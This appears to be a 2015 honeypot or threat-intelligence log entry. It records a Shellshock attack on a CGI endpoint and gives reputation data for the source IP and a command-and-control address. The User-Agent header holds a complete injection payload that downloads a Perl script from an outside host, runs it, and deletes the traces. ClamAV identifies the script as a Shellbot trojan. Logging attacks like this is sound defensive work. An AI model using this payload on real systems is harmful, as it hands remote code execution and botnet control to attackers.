BEGIN OF HTTP DATA:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close
ClamAV reports it as:
license.txt: Trojan.Perl.Shellbot-2 FOUND
221.3.153[.]172
- Static Source: GeoIP data
- Country: China
- ASN: AS4837 CNCGROUP China169 Backbone
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/221.3.153.172
- Static Source: panwdbl.appspot.com
- Comment: Listed in open blacklist
- Reference: https://panwdbl.appspot.com/lists/openbl.txt
The hardcoded C&C address is
69.89.2[.]153
- Static Source: GeoIP data
- Country: United States
- ASN: AS20141 Quality Technology Services, LLC.
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/69.89.2.153